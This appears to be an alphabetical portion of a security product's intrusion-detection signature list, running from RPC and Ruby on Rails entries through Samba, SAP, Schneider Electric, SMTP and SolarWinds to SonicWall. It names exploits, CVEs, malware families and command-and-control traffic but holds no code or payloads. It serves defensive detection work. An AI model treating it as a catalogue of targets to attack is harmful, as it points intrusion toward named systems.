RPC-Status-GHBN-Format-String-Vulnerability
RPC-ToolTalk-Access
RPC-ToolTalk-Buffer-Overflow
RPC-Ttdbserver-Format-String-Vulnerability
RPC-Xdr-Array-Buffer-Overflow
RPC-Yppasswd-Username-BOF
RPC-Ypupdated-Arbitrary-Command-Execution
Rpcbind-Xdr-Parsing-Memory-Exhaustion-Denial-Of-Service
Rpm-Package-Manager-Cpio-Header-Namesize-Integer-Overflow
RSA-Authentication-Web-Agent-Request
RSH-Authentication-Scanner-Vulnerability
Rst-Malware
RSYNC-Backup-Dir-Directory-Traversal
Rsync-Receive_Xattr-Heap-Based-Buffer-Overread
Rsyslog-Pri-Value-Parsing-Integer-Overflow-Denial-Of-Service
RTF-File-Listid-Use-After-Free-Vulnerability
RTSP-Describe-Request-Long-URI-Header
RTSP-Protocol-Usage
RTSP-RealNetworks-Helix-DNA-Server-Require-Header-Buffer-Overflow
RTSP-RealNetworks-Helix-Server-Describe-Request-Buffer-Overflow
Ruby-On-Rails-Action-View-Mime-DOS
Ruby-On-Rails-Activestorage-Insecure-Deserialization
Ruby-On-Rails-Devise-Password-Reset
Ruby-On-Rails-Directory-Traversal-CVE-2014-0130
Ruby-On-Rails-Dynamic-Render-File-Upload-Remote-Code-Execution
Ruby-On-Rails-File-Content-Disclosure
Ruby-On-Rails-JSON-Parse-Heap-Based-Buffer-Overflow
Ruby-On-Rails-JSON-Processor-YAML-Deserialization-Code-Execution
Ruby-On-Rails-Secret_Key_Base-Vulnerability
Ruby-On-Rails-Where-Hash-SQL-Injection
Ruby-On-Rails-XML-Parameter-Parsing-Vulnerability
Ruby-Saml-Authentication-Bypass-CVE-2024-45409
Ruby-Saml-Authentication-Bypass-CVE-2025-25291
Ruby-Saml-Authentication-Bypass-CVE-2025-25292
Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291
Ruby-WEBrick-Denial-Of-Service
Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability
Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection
Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717
Rudder-Server-SQLi-Remote-Code-Execution
Rugged-Director-Denial-Of-Service
Rustdoor-Command-and-Control-Traffic
Rustock-Bot
Rustock-Spambot
RX-Toolbar
Saefko-RAT-C2-Traffic
Safari-In-Operator-Side-Effect-Exploit
Safari-Stack-Based-Out-Of-Bounds
Safari-Webkit-Jit-Exploit-For-iOS
Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow
Safenet-Softremote-Stack-Based-Buffer-Overflow
Sage-Saleslogix-GetConnection-Account-Disclosure
Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution
Sagem-Fast-3304-V1-Denial-Of-Service
SAGEM-Fast-Routers-3304-3464-3504-Authentication-Bypass
Saint-Bot-Infection-Traffic
SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution
Saleslogix-Eviewer-Admin-Command
Sality-Virus
SaltStack-Salt-API-SSH-Client-Command-Injection
SaltStack-Salt-Authorization-Bypass
SaltStack-Salt-Clearfuncs-Directory-Traversal
SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal
Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
Samba-DNS-Reply-Flag-Denial-Of-Service
Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
Samba-LDAP-Ad-Dc-Paged-Search-DoS
Samba-LDAP-Ad-Dc-Privilege-Escalation
Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service
Samba-LSA-RPC-LsaIoTransNames-Request-Handling-Heap-Overflow
Samba-LSA-RPC-LsarAddPrivilegesToAccount-Crafted-Request-Handling-Heap-Overflow
Samba-Mangling-Method-Buffer-Overflow
Samba-MS-RPC-Remote-Command-Execution
Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow
Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow
Samba-NetDFS-RPC-NetDFS-io-dfs-EnumInfo-D-Handling-Heap-Overflow
Samba-Nmbd-Sys_recvfrom-Infinite-Loop-Denial-Of-Service
Samba-Nmbd-Unstrcpy-Buffer-Overflow
Samba-Nttrans-Buffer-Overflow
Samba-Printer-Server-Spoolss-Denial-Of-Service
Samba-Read_Nttrans_EA_List-Infinite-Allocation-Loop-Denial-Of-Service
Samba-receive_smb_raw-SMB-Packets-Parsing-Buffer-Overflow
Samba-Remote-Code-Execution-From-Writable-Share
Samba-Root-File-System-Access-Security-Bypass
Samba-Security-Descriptor-Parsing-Integer-Overflow
Samba-Sid-Parsing-Stack-Buffer-Overflow
Samba-SMB-CIFS-Packet-Assembling-BOF
Samba-SMB1-Information-Disclosure
Samba-SMB1-Message_Push_String-Information-Disclosure
Samba-SMB1-Packets-Chaining-Memory-Corruption
Samba-SMB1-Smb_request_done-Use-After-Free
Samba-smbd-Daemon-Symlink-Verification-Information-Disclosure
Samba-smbd-Flags2-Header-Parsing-DOS
Samba-smbd-Packets-Chaining-AndX-Offset-Infinite-Loop
Samba-smbd-Serverpasswordset-RPC-Memory-Corruption
Samba-smbd-Session-Setup-AndX-Security-Blob-Length-DOS
Samba-Spoolss-RPC-SmbIoNotifyOptionTypeData-Request-Handling-Buffer-Overflow
Samba-Spotlight-Mdssvc-RPC-Denial-Of-Service
Samba-Spotlight-Mdssvc-RPC-Request-Type-Confusion-Denial-Of-Service
Samba-SRVSVC-RPC-SecIoAcl-Request-Handling-Heap-Buffer-Overflow
Samba-Swat-HTTP-Authentication-Buffer-Overflow
Samba-Trans2open-BOF
Samba-Unauthorized-Read-Access-Via-Authentication-Bypass
Samba-Unicode-Filename-Buffer-Overflow
Samba-Vfs_Fruit-Module-Adeid_Finderi-Handling-Out-Of-Bounds-Read-And-Write
Samba-Wild-Card-DoS
Sambar-Cgitest
Sambar-Server-Search-Results-Buffer-Overflow
Sambar-Server-Search-Script-BOF
Saml-XML-Signature-Wrapping
Samsung-Data-Manager-Default-Root-Password
Samsung-Data-Manager-Hardcoded-Credentials
Samsung-Data-Manager-SQL-Injection
Samsung-Ipolis-Device-Manager-Findconfigchildekeylist-Buffer-Overflow
Samsung-Ipolis-Device-Manager-Writeconfigvalue-Stack-Buffer-Overflow
Samsung-Kies-Arbitrary-Command-Execution
Samsung-Net-I-Viewer-Buffer-Overflow
Samsung-Security-Manager-Activemq-Broker-Service-Multiple-Vulnerabilities
Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Buffer-Overflow
Samsung-Smartviewer-CnC_ctrl-ActiveX-Control-Out-Of-Bounds-Indexing
Samsung-Smartviewer-Stwaxconfig-Memory-Corruption
Samsung-Smartviewer-Stwaxconfignvr-Memory-Corruption
Sangoma-Asterisk-Command-Execution
SAP-3d-Visual-Enterprise-Viewer-3dm-File-Buffer-Overflow
SAP-3d-Visual-Enterprise-Viewer-Flic-Animation-Buffer-Overflow
SAP-Business-One-License-Manager-Buffer-Overflow
SAP-Crystal-Reports-2008-Directory-Traversal
SAP-Crystal-Reports-Printcontrol.dll-ActiveX-Control-Buffer-Overflow
SAP-Gateway-Remote-Code-Execution
SAP-GUI-Arbitrary-File-Download
SAP-GUI-Regsvr32.exe-Rule-Security-Policy-Bypass
SAP-GUI-SAPBExCommonResources-ActiveX-Command-Execution
SAP-GUI-Webviewer3d-ActiveX-Control-Arbitrary-File-Overwrite
SAP-Internet-Communication-Manager-HTTP-Request-Smuggling
SAP-Internet-Graphics-Server-XMLCHART-Xxe
SAP-Netweaver-Adiexecblkconv-Message-Server-Buffer-Overflow
SAP-Netweaver-Application-Server-Directory-Traversal-CVE-2017-12637
SAP-Netweaver-As-Java-CRM-Remote-Code-Execution
SAP-Netweaver-As-Java-XML-External-Entity
SAP-Netweaver-CVE-2020-6287
SAP-Netweaver-Diagieventsource-Denial-Of-Service
SAP-Netweaver-Diagtracehex-Denial-Of-Service
SAP-Netweaver-Directory-Traversal
SAP-Netweaver-Dispatcher-Stack-Buffer-Overflow
SAP-Netweaver-Enqueue-Server-DoS
SAP-Netweaver-File-Upload-Vulnerability-CVE-2021-38163
SAP-Netweaver-Information-Disclosure
SAP-Netweaver-Invoker-Servlet-Remote-Code-Execution
SAP-Netweaver-Message-Server-Memory-Corruption
SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution
SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution
SAP-Netweaver-Soap-Request-Sxpg_Command_Execute-Command-Execution
SAP-Netweaver-SQL-Injection-CVE-2016-2386
SAP-Netweaver-Suspicious-Probe-Request
SAP-Netweaver-Visual-Composer-Arbitrary-File-Upload-CVE-2025-31324
SAP-Soap-Information-Disclosure
SAP-Solution-Manager-Remote-Command-Execution
SAP-SQL-Anywhere-.NET-Data-Provider-Column-Alias-Buffer-Overflow
SAP-SQL-Anywhere-.NET-Malformed-Integer-Buffer-Overflow
SAP-Sybase-Esp-Parse-Unsafe-Pointer-Dereference
SAP-Sybase-Event-Stream-Processor-Esp_Parse-Connection-Vulnerability
SAP-Sybase-Event-Stream-Processor-Parse-Connection-Unsafe-Pointer-Dereference
SAPGUI-AddTab-Method-ActiveX-Control-Buffer-Overflow
SAP_SAP-License-Manager-2005-Buffer-Overflow
SAP_SAP-MaxDB-Remote-Arbitrary-Commands-Execution
Sasfis-Bot
Satan-Ransomware
Satel-Iberia-SenNet-Command-Injection
Savant-Web-Server-Overflow
SaveNow-Software
SCADA-AspicManager-Denial-Of-Service
ScadaBR-BruteForce-Password-Attack
ScadaMobile-One-v2.5.2-Directory-Traversal
Scadatec-Limited-Procyon-Buffer-Overflow
Schneider-Electric-Apc-Easy-UPS-Online-Getmacaddressbyip-Command-Injection
Schneider-Electric-C-Bus-Toolkit-Access-Save-Command-Directory-Traversal
Schneider-Electric-C-Bus-Toolkit-Authentication-Bypass-Vulnerability
Schneider-Electric-C-Bus-Toolkit-File-Delete-Command-Arbitrary-File-Delete
Schneider-Electric-C-Bus-Toolkit-File-Download-Command-Directory-Traversal
Schneider-Electric-C-Bus-Toolkit-File-Upload-Project-Name-Directory-Traversal
Schneider-Electric-C-Bus-Toolkit-FILE-UPLOAD-Unrestricted-File-Upload
Schneider-Electric-C-Bus-Toolkit-Project-Restore-Information-Disclosure
Schneider-Electric-ClearSCADA-DoS2
Schneider-Electric-ClearSCADA-Opf-File-Parsing-Out-Of-Bounds-Array-Indexing
Schneider-Electric-Ethernet-Module-Multiple-Services-Hardcoded-Credentials
Schneider-Electric-Gp-Pro-EX-Parseapi-Heap-Buffer-Overflow
Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization
Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization
Schneider-Electric-IGSS-Dc-Opcode-101-Heap-Buffer-Overflow
Schneider-Electric-IGSS-Dc-Opcode-60-Arbitrary-File-Deletion
Schneider-Electric-IGSS-dc.exe-Opcode-60-Arbitrary-File-Deletion
Schneider-Electric-IGSS-Getrmsreportfile-Directory-Traversal
Schneider-Electric-IGSS-IGSSdataServer-CVE-2022-24313-Stack-Buffer-Overflow
Schneider-Electric-IGSS-IGSSdataServer-Opcode1-Out-Of-Bounds-Write
Schneider-Electric-IGSS-IGSSdataserver.exe-Almnote-Integer-Overflow
Schneider-Electric-IGSS-IGSSdataserver.exe-CVE-2022-24315-Out-of-Bounds-Read
Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-5-Out-Of-Bounds-Write
Schneider-Electric-IGSS-IGSSdataserver.exe-Opcode-6-Out-Of-Bounds-Write
Schneider-Electric-IGSS-IGSSupdateservice-Directory-Traversal
Schneider-Electric-IGSS-Opcode2-Out-Of-Bounds-Write
Schneider-Electric-Iiot-Monitor-Downloadcsv-Directory-Traversal
Schneider-Electric-Indusoft-Web-Studio-Remote-Agent-Remote-Code-Execution
Schneider-Electric-Indusoft-Web-Studio-Remote-Code-Execution-CVE-2018-8840
Schneider-Electric-Interactive-Graphical-SCADA-System-Buffer-Overflow
Schneider-Electric-Isobjectmodel-Removeparameter-Stack-Buffer-Overflow
Schneider-Electric-Modicon-M340-Buffer-Overflow-Vulnerability
Schneider-Electric-Pelco-DS-nvs-Rvctl.rvcontrol.1-Buffer-Overflow
Schneider-Electric-Pelco-Endura-Encoder
Schneider-Electric-PLC-ETY-Denial-Of-Service
Schneider-Electric-Proclima-Atx45-Sethtmlfilename-Heap-Buffer-Overflow
Schneider-Electric-Proclima-F1bookview-Attach-Memory-Corruption
Schneider-Electric-Proclima-F1bookview-Attachtoss-Memory-Corruption
Schneider-Electric-Proclima-F1bookview-Copyall-Memory-Corruption
Schneider-Electric-Proclima-F1bookview-Setvalidationrule-Memory-Corruption
Schneider-Electric-Proclima-Metadraw-Arrangeobjects-Memory-Corruption
Schneider-Electric-Proclima-Metadraw-ObjLinks-Remote-Code-Execution
Schneider-Electric-SCADA-Expert-ClearSCADA-Authentication-Bypass
Schneider-Electric-SCADA-Expert-ClearSCADA-Denial-Of-Service
Schneider-Electric-Somachine-Axeditgrid-ActiveX-Untrusted-Pointer-Dereference
Schneider-Electric-Struxureware-Data-Center-Expert-Command-Injection
Schneider-Electric-Struxureware-Data-Center-Expert-Fwupd-Directory-Traversal
Schneider-Electric-U.motion-Builder-css.inc.php-Arbitrary-File-Inclusion
Schneider-Electric-U.motion-Builder-loadtemplate.php-SQL-Injection
Schneider-Electric-U.motion-Builder-Localize-SQL-Injection
Schneider-Electric-U.motion-Builder-nfcserver.php-SQL-Injection
Schneider-Electric-U.motion-Builder-runscript.php-Directory-Traversal
Schneider-Electric-U.motion-Builder-Track-SQL-Injection
Schneider-Electric-Unity-Pro-Denial-Of-Service
Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow
Schneider-Electric-Vijeo-Web-Gate-Server-Denial-Of-Service
Schneider-Electric-Vijeo-Web-Gate-Server-Directory-Traversal
Schneider-Electric-Web-Designer-ServerSimulator-RCE
School-Management-Pro-Wordpress-Plugin-Backdoor-CVE-2022-1609
Schweitzer-SEL-2032-Commands
Script-In-HTTP-POST
Script-Self-Reference
Script-Tag-In-URI
Seagate-Business-NAS-Remote-Code-Execution
SearchBlox-Multiple-Authentication-Bypass-Vulnerabilities
Searchmyrequest
Security-Management-Center-Failed-Login
Sednit-Exploit-Kit
Selenium-Chrome-RCE
Self-Signed-Certificate-With-Default-Values
Sendmail-Etrn-DoS
Sendmail-Mime-BOF
Serendipity-FrontPage-SQL-Injection
Serv-U-FTP-Server-Command-Buffer-Overflow
Serv-U-List-Parameter-Buffer-Overrun
Serv-U-Stou-Command-DoS
Server-Side-Request-Forgery-In-Oracle-WebLogic-Server-CVE-2014-4210
Server-Version-Number-Disclosure
ServHelper-Malware-Infection-Traffic
ServiceNow-Now-Platform-Remote-Code-Execution-CVE-2024-4879
ServiceNow-Now-Platform-Sensitive-File-Read-CVE-2024-5178
ServiceNow-Now-Platform-Template-Injection-CVE-2024-5217
Serviio-Media-Server-checkStreamUrl-Command-Execution
Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XEE-Injection
ShadowPad-C2-Traffic
Shady-RAT-Backdoor
Shamoon-DistTrack-Malware
Sharepoint-Callback-Function-Vulnerability-CVE-2013-0080
Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
SharePoint-Workflows-XOML-Injection-CVE-2020-0646
Shellbot-Perl-Malware
Shellcode-Encoder
ShixxNOTE-6.net-Font-Field-Overflow
Shlayer-Trojan-Infection-Traffic
Shopathome
Shopnav
Shopware-Gettemplatename-Local-File-Inclusion
Shopware-PHP-Object-Instantiation-RCE
Short-SSH-Authentication
SHOUTcast-Stream-Usage
SHTTPD-POST-Request-Buffer-Overflow
SideWinder-APT-C2-Traffic
Sielco-Sistemi-Winlog-Pro-Malformed-Packet-Stack-Buffer-Overflow
Sielco-Sistemi-Winlog-RunTime.exe-Malformed-Packet-Parsing-Remote-Overflow
Siemens-Automation-License-Manager-ActiveX-Control-Vulnerability
Siemens-Automation-License-Manager-Almsrv64x.exe-Integer-Overflow
Siemens-FactoryLink-Logging-Path-Param-Buffer-Overflow
Siemens-Gigaset-se551-Authorization-Bypass
Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection
Siemens-SIMATIC-WinCC-Flexible-Runtime-Stack-Buffer-Overflow
Siemens-SIMATIC-WinCC-RegReader-ActiveX-Control-Buffer-Overflow
Siemens-Sinec-NMS-CVE-2021-33730-SQL-Injection
Siemens-Sinec-NMS-CVE-2021-33731-SQL-Injection
Siemens-Sinec-NMS-CVE-2021-33733-SQL-Injection
Siemens-Sinec-NMS-CVE-2021-37200-Directory-Traversal
Siemens-Sinec-NMS-Export-Firmware-Container-Directory-Traversal
Siemens-SIPROTEC-4-And-SIPROTEC-Compact-EN100-Ethernet-Module-DoS
Siemens-Solid-Edge-ST4/ST5-WebPartHelper-ActiveX-Control-Vulnerability
Siemens-Tecnomatix-FactoryLink-CSService-File-Download
Siemens-Tecnomatix-FactoryLink-Multiple-Buffer-Overflows
Siemens-Tecnomatix-Plant-Simulation-Spp-File-Parsing-Stack-Buffer-Overflow
Siemens-WinCC-Hard-Coded-Login
Siemens-WinCC-MiniWeb-Denial-Of-Service
Siemens-WinCC-TIA-Portal-MiniWeb-DoS
Sierra-Wireless-ALEOS-Acemanager-Cross-Site-Scripting-CVE-2023-40461
Sierra-Wireless-ALEOS-Acemanager-Denial-Of-Service-CVE-2023-40459
Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
Simple-PHP-Blog-Remote-Command-Execution
SimpleHelp-Unauthenticated-Path-Traversal-CVE-2024-57727
SIP-Cisco-IP-Phone-Invite-IP-Address-Denial-Of-Service
SIP-Digium-Asterisk-Invalid-RTP-Payload-Type-Number-Memory-Corruption
SIP-Digium-Asterisk-Multiple-SDP-Parameters-Parsing-Buffer-Overflow
Siretta-Quartz-Gold-Router-OS-Command-Injection
Siretta-Quartz-Gold-Router-Stack-Buffer-Overflow
Sitecom-Home-Storage-Center-Directory-Traversal
Sitecore-Experience-Platform-Preauth-Deserialization-RCE
Sitecore-Multiple-Products-ThumbnailsAccessToken-Insecure-Deserialization
Sitecore-XP-Insecure-Deserialization
SixApart-Movable-Type-Code-Execution
SkyBlueCanvas-CMS-Command-Execution
SKYPE-Network-Usage
SKYPE-Skype4com-URI-Handler-Remote-Heap-Corruption
Skywiper-B-Trojan
Skyworth-GPON-HomeGateways-And-Optical-Network-Terminals-Stack-Overflow
SLMail-POP3-Server-Password-BOF
Slowloris-HTTP-DOS-Tool
Smail-3-Mail-From-BOF
Small-AVI-Container
Small-HTTP-Server-Msdos-Device-Name-DoS
Smart-Install-Exploitation-Tool
Smart-Software-Solutions-Codesys-Controlservice-Stack-Buffer-Overflow
Smart-Software-Solutions-Codesys-ENI-Server-Stack-Buffer-Overflow
Smart-Software-Solutions-Codesys-Gateway-Server-Heap-Buffer-Overflow
Smart-Software-Solutions-Codesys-Gateway-Server-Integer-Overflow
Smart-Software-Solutions-Codesys-Gateway-Server-Traversal
Smart-Software-Solutions-Codesys-Webserver-Stack-Buffer-Overflow
Smartertools-Smartermail-Message-Onerror-Stored-Cross-Site-Scripting
SmartScreen-Security-warning-Bypass-For-MSI-Files-CVE-2023-24880
Smartstore-Smartstorenet-Forumpost-Stored-Cross-Site-Scripting
Smartstore-Smartstorenet-Privatemessages-Stored-Cross-Site-Scripting
Smarty-Template-Engine-Sandbox-Escape-CVE-2021-26119
SMB-AndX-Chain
SMB-Client-Memory-Allocation-CVE-2010-0269
SMB-Failed-Session-Setup
SMB-Filename-Obfuscation
SMB-Multiple-Tree-Connections
SMB-NetBIOS-Request-Buffer-Overflow
SMB-Nonzero-Reserved-Value-In-AndX-Header
SMB-Pool-Overflow-MS10-054
SMB-Samba-Domain-Controller-Service-Crafted-Mailslot-Name-Buffer-Overflow
SMB-Samba-Dot-Slash-Combination-Directory-Traversal
SMB-Transaction-Command-Nonzero-Reserved-Field
SMB-Unimplemented-Command-Com-Close-And-Tree-Disc
SMB-Unimplemented-Command-Com-New-File-Size
SMB-Windows-Server-Message-Block-Vulnerability
SMB2-Dialect-Requested
SMB_CA-BrightStor-Discovery-Service-Mailslot-Buffer-Overflow-Vulnerability
SMTP-1st-Up-Multi-Command-Crash
SMTP-Analogx-Helo-BOF
SMTP-Apple-Appleshare-Helo-BOF
SMTP-Apple-Stalker-Helo-BOF
SMTP-BitDefender-AntiVirus-Logging-Function-Format-String
SMTP-Citadel-Helo-BOF
SMTP-Cmail-Helo-BOF
SMTP-Csm-Helo-BOF
SMTP-Debug-Backdoor
SMTP-Dsmtp-Xtellmail-Format-String-System-Compromise
SMTP-Eserv-Helo-BOF
SMTP-Exchange-Helo-BOF
SMTP-Exchange-Mail-Relay
SMTP-Exchange-Server-X-LINK2STATE-Chunk-System-Compromise
SMTP-Extremail-Flow-Format-Strings-Vulnerability
SMTP-FTGatePro-Mail-Server-RCPT-To-Buffer-Overflow
SMTP-IBM-Lotus-Notes-UUE-File-Handling-Buffer-Overflow
SMTP-Imate-Webmail-Helo-BOF
SMTP-Ipswitch-Collaboration-Suite-Multiple-Commands-Format-String-Vulnerability
SMTP-Ipswitch-Helo-BOF
SMTP-Ipswitch-IMail-Server-SMTP-Service-Buffer-Overflow
SMTP-Lotus-Notes-RCPT-To-Policy-BOF
SMTP-Mail-Relay
SMTP-MailEnable-SMTP-Authentication-Buffer-Overflow
SMTP-MailEnable-SMTP-Helo-Command-Denial-Of-Service
SMTP-Mailman-Bad-Date-Data-Denial-Of-Service
SMTP-Mailman-Utf8-Encoded-Attachment-Filename-Denial-Of-Service
SMTP-Mailmax-BOF
SMTP-McAfee-WebShield-SMTP-Bounce-Message-Format-String
SMTP-MDaemon-Content-Filter-Directory-Traversal
SMTP-MDaemon-Helo-BOF
SMTP-Mercury-Mail-Transport-System-SMTP-Auth-Cram-md5-Buffer-Overflow
SMTP-Microsoft-Collaboration-Data-Objects-BOF
SMTP-Msgcore-DoS
SMTP-Netscape-Messaging-Server-RCPT-To-DoS
SMTP-Notes-Relay
SMTP-Novell-Groupwise-RCPT-To-BOF
SMTP-Pipe-Sendmail-Attack
SMTP-Qk-SMTP-Server-RCPT-To-Command-Buffer-Overflow
SMTP-RCPT-To-Decode
SMTP-RCPT-To-File
SMTP-Sendmail-Header-BOF
SMTP-Sendmail-Helo-Hide-Sender-BOF
SMTP-Sendmail-Nochar-BOF
SMTP-Sendmail-Prescan-Buffer-Overflow
SMTP-Sendmail-Timeout-Buffer-Overflow
SMTP-Server-HELP-Command-Buffer-Overflow
SMTP-SpamAssassin-Malformed-Email-Header-DoS
SMTP-SquirrelMail-Content-Type-Header-Cross-Site-Scripting
SMTP-Src-Helo-BOF
SMTP-VirusWall-Helo-BOF
SMTP-Winsmtp-Helo-BOF
SMTP-Wiz-Backdoor
SMTP-Xtramail-Helo-BOF
SMTP_Citadel-SMTP-RCPT-To-Remote-Buffer-Overflow
Snake-Keylogger-Infection-Traffic
SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
Snap-Creek-Duplicator-Wordpress-Plugin-Code-Injection
SNIProxy-New_address-Stack-Buffer-Overflow
SNMP-Castle-Rock-Computing-SNMPc-Network-Manager-Community-String-BOF
SNMP-Common-Unix-Printing-System-ASN1-BOF
SNMP-Default-Community-String-Usage
SNMP-Default-Community-String-WINS-DoS
SNMP-Linux-Kernel-SNMP-NAT-Helper-SNMP-Trap-Decode-DoS
SNMP-Microsoft-SNMP-Service-Buffer-Overflow
SNMP-Nodemanager-SNMP-Trap-Buffer-Overflow
SNMP-Trap-Service-GET-Request-DoS
Snort-Back-Orifice-Pre-Processor-Buffer-Overflow
Snort-DCE/RPC-Preprocessor-Stack-Based-Buffer-Overflow
Snort-frag3-Preprocessor-Fragmented-IP-Packet-Detection-Evasion
SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202
SocGholish-Framework-Activity
SOCKS4-Protocol
SOCKS5-Protocol
Soda-PDF-Insecure-Library-Loading
SoftiaCom-WMailserver-Buffer-Overflow
Softing-Edgeaggregator-Restore-Configuration-Directory-Traversal
Softing-Secure-Integration-Server-v1.22-RCE
Softmaker-Office-Planmaker-Excel-Sst-Record-Buffer-Overflow
Softmaker-Office-Planmaker-Pmd-Document-0x8010-Record-Out-Of-Bounds-Write
Softmaker-Office-Planmaker-Pmd-Document-Records-Integer-Overflow
SOHO-Router-Products-Cookie-Parsing-Authentication-Bypass
Sojourn-File-Disclosure
Solaris-Answerbook2-Format-Strings-Vulnerability
Solaris-BIND-Inverse-Query-BO
Solaris-Rwalld-RPC-Call-Format-String-Vulnerability
Solaris-sadmind-Auth-Sys-System-Compromise
Solaris-SnmpXdmid-Malformed-DMI-Request-BOF
Solaris-Telnet-Passwordless-Remote-Access
Solarview-Compact-Command-Injection-CVE-2022-29303
Solarview-Compact-Command-Injection-CVE-2023-23333
Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-23478
Solarwinds-Access-Rights-Manager-Insecure-Deserialization-CVE-2024-28075
Solarwinds-Dameware-Mini-Remote-Control-CltDHPubKeyLen-Out-of-Bounds-Read
Solarwinds-Dameware-Mini-Remote-Control-Rsapubkeylen-Heap-Buffer-Overflow
Solarwinds-Dameware-Mini-Remote-Control-RsaSignatureLen-Out-of-Bounds-Read
Solarwinds-Dameware-Sigpubkey-Heap-Buffer-Overflow
Solarwinds-Firewall-Security-Manager-Userlogin.jsp-Policy-Bypass
Solarwinds-Log-And-Event-Manager-Static-Credentials
Solarwinds-Network-Configuration-Manager-Arbitrary-File-Write
Solarwinds-Network-Performance-Monitor-CVE-2022-38111-Insecure-Deserialization
Solarwinds-Network-Performance-Monitor-CVE-2022-47503-Insecure-Deserialization
Solarwinds-Network-Performance-Monitor-CVE-2023-23836-Insecure-Deserialization
Solarwinds-Network-Performance-Monitor-Fromjson-Insecure-Deserialization
Solarwinds-Network-Performance-Monitor-Sqlfilescript-Insecure-Deserialization
Solarwinds-Network-Performance-Monitor-Updateactionsdescriptions-SQL-Injection
Solarwinds-NPM-BytesToMessage-Insecure-Deserialization
Solarwinds-NPM-DeserializeFromStrippedXml-Insecure-Deserialization
Solarwinds-NPM-Propertybagjsonconverter-Insecure-Deserialization
Solarwinds-Orion-Ipam-Reflected-Cross-Site-Scripting
Solarwinds-Orion-NPM-Remote-Code-Execution
Solarwinds-Orion-Patch-Manager-Chart-Insecure-Deserialization
Solarwinds-Orion-Patch-Manager-Edittopxx-Insecure-Deserialization
Solarwinds-Orion-Patch-Manager-Wsasyncexecutetasks.aspx-Insecure-Deserialization
Solarwinds-Orion-Pepco32c-ActiveX-Control-Buffer-Overflow
Solarwinds-Orion-Platform-Authentication-Bypass
Solarwinds-Orion-Platform-MSMQ-Insecure-Deserialization
Solarwinds-Orion-Platform-Rendercontrol-Insecure-Deserialization
Solarwinds-Security-Event-Manager-Amf-Insecure-Deserialization
Solarwinds-Serv-U-Directory-Traversal-CVE-2024-28995
Solarwinds-Serv-U-FTP-Server-SSH-AES-NEWKEYS-Uninitialized-Memory-Use
Solarwinds-Serv-U-FTP-Server-User_Full_Name-Stored-Cross-Site-Scripting
Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Code-Execution
Solarwinds-Server-And-Application-Monitor-Loadextensionfactory-Stack-BO
Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection
Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection
Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection
Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection
Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection
Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection
Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection
Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection
Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection
Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection
Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection
Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection
Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection
Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection
Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass
Solarwinds-Storage-Manager-Authenticationfilter-Policy-Bypass
Solarwinds-SunBurst-Traffic
Solarwinds-TFTP-Server-Denial-Of-Service
Solarwinds-Virtualization-Manager-Apache-Commons-Deserialization
Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization
Solarwinds-Web-Help-Desk-Hard-Coded-Credentials
SolusLabs-SolusVM-Centralbackup-SQL-Injection
Sonatype-Nexus-Expression-Language-Injection-CVE-2018-16621
Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204
Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-XSS
Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection
Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting
Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal
SonicWall-Command-Injection-CVE-2021-20039
SonicWall-Email-Security-Path-Traversal-CVE-2021-20023
SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal
SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection
SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal
